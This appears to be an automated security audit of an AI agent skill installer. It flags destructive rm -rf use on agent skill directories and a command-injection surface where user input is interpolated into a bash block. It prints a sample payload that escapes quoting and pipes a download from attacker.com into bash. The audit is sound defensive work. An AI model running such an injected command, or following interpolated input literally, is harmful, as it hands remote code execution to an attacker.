install-agent-skills
Warn
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (MEDIUM): The skill is designed to execute a local bash script (
scripts/install.sh) that performs potentially destructive filesystem operations. - The script uses
rm -rf "$TARGET_SKILL"to remove existing directories before installation. - It targets sensitive configuration paths for AI agents, such as
~/.claude/skills,~/.codex/skills, and~/.config/opencode/skills. - [PROMPT_INJECTION] (LOW): The instructions in
SKILL.mdpresent an indirect command injection surface by interpolating the user-provided{argument}directly into a bash script block:SKILL="{argument}". - Ingestion points: The
$ARGUMENTSvariable inSKILL.mdStep 3. - Boundary markers: None present. The argument is placed directly into a variable assignment within a markdown bash block.
- Capability inventory: The
install.shscript has the capability to delete directories (rm -rf), create directories (mkdir -p), and create symlinks (ln -s). - Sanitization: The bash script uses
basename "$SOURCE_SKILL"which provides some mitigation against path traversal for the$TARGET_SKILLvariable, but the initial command construction in the instructions remains vulnerable if the agent executes the block literally with malicious input (e.g.,myskill"; curl http://attacker.com | bash; #).
Audit Metadata